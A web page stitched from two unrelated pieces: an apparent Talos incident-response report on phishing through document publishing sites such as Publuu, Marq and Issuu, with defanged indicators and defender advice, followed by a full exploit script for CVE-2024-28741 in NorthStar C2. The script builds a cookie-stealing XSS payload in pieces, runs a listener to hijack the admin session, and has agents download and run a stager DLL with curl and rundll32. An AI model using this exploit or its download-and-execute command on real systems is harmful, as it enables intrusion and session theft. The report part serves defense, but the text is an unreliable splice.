**Adversary advantages create challenges for defenders**

DDP sites create advantages for threat actors seeking to thwart contemporary phishing protections. The same features and benefits that attract legitimate users to these sites can be abused by threat actors to increase the efficacy of a phishing attack. Given some of these advantages, threat actors may find DDP sites as useful as creating spoofed domains or compromising legitimate sites for phishing and credential theft.

**DDP sites offer low-cost, transient file hosting**

Many DDP sites offer either a free tier or a no-cost trial period where a defined number of files can be published for a limited time. No-cost trial periods usually require only limited personal identifiers and no payment methods. Threat actors can quickly and easily create multiple free accounts, with a varying number of malicious pages per account.

Some DDP sites also allow a link expiration to be set for published content. This feature creates a “set it and forget it” capability for threat actors, who are no longer required to closely track where phishing documents have been deployed so they can be decommissioned. Instead, a link expiration date and time is configured during page creation, ensuring the content will be rendered unavailable automatically, usually after only a short time.

Talos IR observed instances where an adversary launched, then disabled a DDP page in fewer than 24 hours, and others where the DDP page was left active but the final landing page on the adversary-controlled domain was removed through DNS fast fluxing or another mechanism.

This transient nature of DDP pages creates challenges for security teams and complicates the incident response process. While it’s possible to detect, create internal alerts for, and/or notify security personnel about a DDP-hosted lure, the brief availability of the pages creates a compressed response time for defenders. Understanding the theme of the lure, the associated adversary-controlled domains, and the intent of the attack in such a short time may be difficult, even for experienced security teams.

**DDP sites usually have a favorable web reputation.**

The ratio of legitimate to compromised pages hosted on DDP sites is likely quite low. While that ratio seemed to vary by DDP provider, Talos IR found that most pages created recently across all DDP sites hosted legitimate content. Unless this trend continues to shift toward hosting greater volumes of malicious content, these sites will maintain a favorable reputation score and are less likely to be included in automated blocklists. 

A favorable web reputation score may also mislead users who investigate the DDP site using popular open-source intelligence tools or a basic internet search, leading to higher click and credential capture rates than sites with an unknown or poor reputation.

**Site**

**Domain Registration**

**Umbrella Unique Visitors Score\***

**Umbrella Reputation Score\*\***

**Publuu**

2019-02-28 (IS)

63

53 (Medium Risk)

**Marq**

2004-06-19 (IS)

76

9 (Low Risk)

**FlipSnack**

2010-06-03 (US)

96

11 (Low Risk)

**Issuu**

2007-04-19 (GB)

100

9 (Low Risk)

**RelayTo**

2013-12-02 (US)

53

58 (Medium Risk)

_\* Umbrella’s Unique Visitors Score is included to illustrate estimated traffic volume per site as of Feb. 2, 2024._

_\*\* Reputation Score as of Feb. 2, 2024._

**DDP productivity features may inhibit malicious link detection.**

Talos IR found that productivity features on at least one DDP site inhibited traditional methods of extracting the true URL from a phishing link. During the investigation of a malicious document hosted on Publuu, a custom sub-menu was displayed when the user right-clicked on the URL. While this sub-menu included options that would benefit legitimate users, it did not provide a clear option to copy the URL behind the “View Online PDF” hyperlink. Further, no tooltip popups appeared to show the URL when hovering over the link. 

**Case studies**

Two recent Talos IR engagements involved the use of a DDP site as part of potential credential and session token-harvesting attacks.

**Publuu**

Several individuals at the targeted organization received phishing emails from a compromised email address belonging to a trusted third-party vendor with the subject, “New Document from \[third-party vendor\]”.

The link included in the body of the email led to a Publuu flipbook, with a URL like https://publuu[.]com/flip-book/[6_digit_identifier]/[6_digit_identifier]. The phishing document was a generic, widely used file observed in similar attacks on other DDP sites. However, while the phishing document was reused, the adversary had modified the Publuu page with the sender organization’s name to lend authenticity to the document.

Clicking the “VIEW ONLINE PDF” link directed the user to a Cloudflare CAPTCHA, a technique described in the publications by Cofense and Netskope linked above. Use of the CAPTCHA likely has a dual purpose, as it both protects the credential harvesting page from automated access while giving the impression of a legitimate site to users who fall victim to the phishing link.

After completing the CAPTCHA, the victim is directed to a convincing replica of a Microsoft 365 authentication page. The URL for the page contains a lengthy alphanumeric string, which may act as an identifier for the visitor. The adversary-controlled domain associated with the authentication page was atlas-aerspace[.]onlineextracted. The customization of the original Publuu page to the target organization in contrast to this unrelated spoofed domain suggests this incident may have been part of a cascading BEC attack.  

Talos IR later identified an attack chain hosted on the Issuu DDP site with similar indicators. The phishing document was nearly identical, though, unlike the Publuu link, this link URL leveraged the Google AMP to Cloudflare CAPTCHA flow described in the Cofense blog. The credential harvest page was ultimately located at the domain aerospace-atlas[.]online and included the same identifier-style URL string as the one observed with the atlas-aerspace[.]online90 days domain.

In aggregate, the following similar domains – all hosted by Cloudflare – were registered within 90 days. The first two domains were found to be associated with phishing lures hosted on DDP sites, suggesting an effort to target users of the legitimate atlas-aerospace[.]com domain.

*   aerospace-atlas[.]online (registered Jan. 24, 2024)
*   atlas-aerspace[.]online (registered Dec. 19, 2023)
*   atlas-aerspace[.]com (registered Oct. 25, 2023)

Talos provided notification through established channels so affected organizations could review and address this activity.

**Marq**

Talos IR also responded to an incident involving the Marq DDP site. The Marq page hosting the phishing document had already been deactivated, but Talos IR used other forensic data to determine the URL of the associated credential harvesting page. The first part of that URL was https[:]//mvnwsenterprise[.]top:443/aadcdn.msauth.net/.

While the Marq page could not be accessed, Talos IR identified similar pages through open- and closed-source intelligence. These pages were customized to show the sender organization in the HTML Title tag (displayed in the browser tab) but otherwise used an identical “Microsoft365 Online Fax” lure. Unlike some activity clusters on other DDP sites, each page was configured with a unique URL using the .top top-level domain, such as onedrivesmncs[.]top, onedrivemwsamc[.]top, and 347nsm239mws934[.]top. Another common characteristic was the presence of the URL query string tkmilric in all URLs embedded in the phishing document. 

Once clicked, the link passed the user to the spoofed Microsoft authentication page, which resided at the redirect.cgi path of the unique \`.top\` domain. The URL query string for this page included a “ref” parameter, which contained a Base64 and URL encoded value. An example of the decoded value is:

https://login.microsoftonline.com/common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000&redirect_uri=https://outlook.office.com/owa/&resource=00000002-0000-0ff1-ce00-000000000000&response_mode=form_post&response_type=code id_token&scope=openid&msafed=1&msaredir=1&client-request-id=**[REDACTED]**&protectedtoken=true&claims={"id_token":{"xms_cc":{"values":["CP1"]}}}&nonce=**[REDACTED]**&state=**[REDACTED]**

The value 00000002-0000-0ff1-ce00-000000000000 found in the client_id and resource parameters is the Microsoft Application ID for Office 365 Exchange Online. The claims string {"id_token":{"xms_cc":{"values":["CP1"]}}} is a required component for a client application to communicate its capabilities to Microsoft Entra ID in an OAuth 2.0 authorization flow. These characteristics likely indicate a campaign to capture session tokens for Microsoft 365 components using the same lure and customized or DGA-generated domains.

**Other DDP Sites**

Following these investigations, Talos IR identified similar activity on other DDP sites. The following examples are provided to demonstrate similarities across DDP sites and are not related to any ongoing or prior Talos IR investigations.

**Flipsnack**

Talos IR identified at least two lure formats used recently on FlipSnack – one eFax PDF-themed lure, and one SharePoint PDF-themed lure. Both landing pages had been removed by the adversary at the time of Talos IR’s review, but the URL for the adversary-controlled page associated with the SharePoint lure (afurrytailwedding[.]com/cure/MSthOffice/index.phpexcept) could indicate a potential Microsoft 365 credential harvesting effort. Neither lure had been customized to target a specific victim. 

**Issuu**

Malicious documents found on Issuu were very similar to those observed on Publuu, except for minor details like a “Reference” number and the link URL. Of the two links tested by Talos IR, one was redirected through an intermediary site before reaching the landing page. The other leveraged the Google AMP and Cloudflare CAPTCHA flow reported by Cofense. Again, the landing pages for both examples had been removed by the adversary at the time of Talos IR’s review.

**RelayTo**

Talos IR located at least two different phishing lures that had been deployed to the RelayTo site in early September 2023. One of these lures was published repeatedly from multiple RelayTo accounts with modifications to only the name of the associated organization. The link in each lure – https[:]//secure-docsx[.]com/efgh5678 – was the same. The secure-docsx[.]combefore the domain had been registered a week this activity began and was followed by the creation of the secure-docu[.]com domain, with which it shared registrant details.

**SimpleBooklet**

Talos IR could not locate a malicious page on the SimpleBooklet site that had not already been deactivated. However, a review of related URLs in VirusTotal suggests that an adversary made prolific use of this site for phishing and possible credential theft from October 2020 through January 2021.

**Defender actions**

Defenders should consider the following actions to help defend against phishing attacks that leverage DDP sites.

*   Block common DDP sites via border security devices, endpoint detection and response (EDR) like Cisco Secure Endpoint, web content filtering, and/or DNS security controls if access to these sites is not required for normal business operations. If blocking these sites will disrupt normal operations, develop a procedure to ensure malicious domains identified in DDP-hosted phishing lures can be quickly blocked.
*   Configure email security controls to detect and alert on links in emails containing common DDP site URLs.
*   Leverage threat intelligence to quickly identify newly created sites related to known threats – in this case, new DDP sites that may be leveraged by threat actors.
*   Monitor for behavioral trends within the organization’s internal environment that could indicate coordinated malicious activity, including activity to blocked sites.
*   Update user security awareness training to include information about DDP sites and other cloud-hosted phishing attack methods. Reinforce a “see something, say something” mentality when users are uncertain about a site’s legitimacy.

End users can also support defenders by remaining vigilant for documents shared over unusual or uncommon sites, even if those sites are legitimate and have a favorable reputation, and by following their organization’s guidelines for reporting suspicious emails.

Threat actors leverage document publishing sites for ongoing credential and session token theft

NorthStar C2 agent version 1.0 applies insufficient sanitization on agent registration routes, allowing an unauthenticated attacker to send multiple malicious agent registration requests to the teamserver to incrementally build a functioning javascript payload in the logs web page. This cross site scripting payload can be leveraged to execute commands on NorthStar C2 agents.

    # Exploit Title: NorthStar C2 agent RCE via stored XSS# Date: 2024-03-11# Exploit Author: @_chebuya# Software Link: https://github.com/EnginDemirbilek/NorthStarC2# Version: v1.0# Tested on: Ubuntu 20.04 LTS# CVE: CVE-2024-28741# Description: NorthStar C2 applies insufficient sanitization on agent registration routes, allowing an unauthenticated attacker to send multiple malicious agent registration requests to the teamserver to incrementally build a functioning javascript payload in the logs web page.  This XSS can be leveraged to execute commands on NorthStar C2 agents# Blog: https://blog.chebuya.com/posts/discovering-cve-2024-28741-remote-code-execution-on-northstar-c2-agents-via-pre-auth-stored-xss/from http.server import BaseHTTPRequestHandler, HTTPServerfrom bs4 import BeautifulSoupimport requestsimport base64import threadingimport timeimport osclass Collector(BaseHTTPRequestHandler):    def do_GET(self):        cookie = self.path.split("=")[1]        print("Cookie: " + cookie)        self.send_response(200)        self.end_headers()        self.wfile.write(b"")        background_thread = threading.Thread(target=steal_agents, args=(cookie,))        background_thread.start()        self.server.shutdown()def agent_execute_command(agent_id, csrf_token, headers, command):    data = {        'slave': agent_id,        'command': command,        'sid': agent_id,        'token': csrf_token    }    r = requests.post(target_url + '/functions/setCommand.nonfunction.php', headers=headers, data=data)    while True:        r = requests.get(target_url +  f"/getresponse.php?slave={agent_id}", headers=headers)        if len(r.text) != 0 or command == "die":            break                time.sleep(1)def steal_agents(cookie):    headers = {        "Cookie": f"PHPSESSID={cookie}"    }    r = requests.get(target_url + "/clients.php", headers=headers)    soup = BeautifulSoup(r.text, 'html.parser')    rows = soup.find_all('tr')    agent_ids = []    hostnames = []    for row in rows:        cells = row.find_all('td')        if len(cells) != 9:            continue        status = cells[7].text.strip()        if status != 'Online':            continue        agent_ids.append(cells[1].text.strip())        hostnames.append(cells[5].text.strip())    script_tags = soup.find_all('script')    csrf_token = None    for script_tag in script_tags:        if 'csrfToken' in script_tag.text:            csrf_token = script_tag.text.split('"')[1]            break    if csrf_token:        print("CSRF Token:", csrf_token)    else:        print("CSRF Token not found")        return    for i in range(len(agent_ids)):        agent_id = agent_ids[i]        hostname = hostnames[i]        print(f"Stealing {hostname} ({agent_id})...")        print("Enabling shell mode")        agent_execute_command(agent_id, csrf_token, headers, "enablecmd")        print(f"Running sliver cradle: {cradle_command}")        agent_execute_command(agent_id, csrf_token, headers, cradle_command)        print("Disabling shell mode")        agent_execute_command(agent_id, csrf_token, headers, "disablecmd")        print("Sending suicide to slave")        agent_execute_command(agent_id, csrf_token, headers, "die")        print("Exploit finished, exiting")    os._exit(0)def xor_encryption(text, key):    encrypted_text = ""        for i in range(len(text)):        encrypted_text += chr(ord(text[i]) ^ ord(key[i % len(key)]))        return encrypted_textdef generate_sid(sid):    encrypted_sid = xor_encryption(sid, "northstar")    return base64.urlsafe_b64encode(encrypted_sid.encode()).decode()def exploit(target_url, callback_url):    target_url = target_url.rstrip("/") + "/login.php"    protocol = callback_url.split(":")[0] + "://"    host = callback_url.split("/")[2].split(":")[0]    h1, h2 = host[:len(host)//2], host[len(host)//2:]        if callback_url.count(":") == 2:        port = callback_url.split(":")[2]    else:        if protocol == "https://":            port = "443"        else:            port = "80"    sid_payloads = ["N*/</script><q", "N*/i.src=u/*q", "N*/new Image;/*q", "N*/var i=/*q", "N*/s+h+p+'/'+c;/*q", "N*/var u=/*q", f"N*/'{protocol}';/*q", "N*/var s=/*q", f"N*/':{port}';/*q", "N*/var p=/*q", "N*/a+b;/*q", "N*/var h=/*q", f"N*/'{h2}';/*q", "N*/var b=/*q", f"N*/'{h1}';/*q", "N*/var a=/*q", "N*/d.cookie;/*q", "N*/var c=/*q", "N*/document;/*q", "N*/var d=/*q", "N</td><script>/*q"]    for sid in sid_payloads:        print(sid)        params = {            'sid': generate_sid(sid)        }        requests.get(target_url, params=params, verify=False)def run(port):    server_address = ('', int(port))    httpd = HTTPServer(server_address, Collector)    print(f'Server running on port {port}')    httpd.serve_forever()cradle_command = r"curl http://192.168.1.6:8000/stager.dll > c:\users\public\stager.dll & rundll32 c:\users\public\stager.dll,inject & echo DONE"callback_host = "192.168.1.6"callback_port = "8080"target_url = "http://192.168.1.4:80"callback_url = f"http://{callback_host}:{callback_port}"print("Sending malicious agent registrations...")exploit(target_url, callback_url)print("Registrations finished, waiting for execution...")run(callback_port)

Tag

#php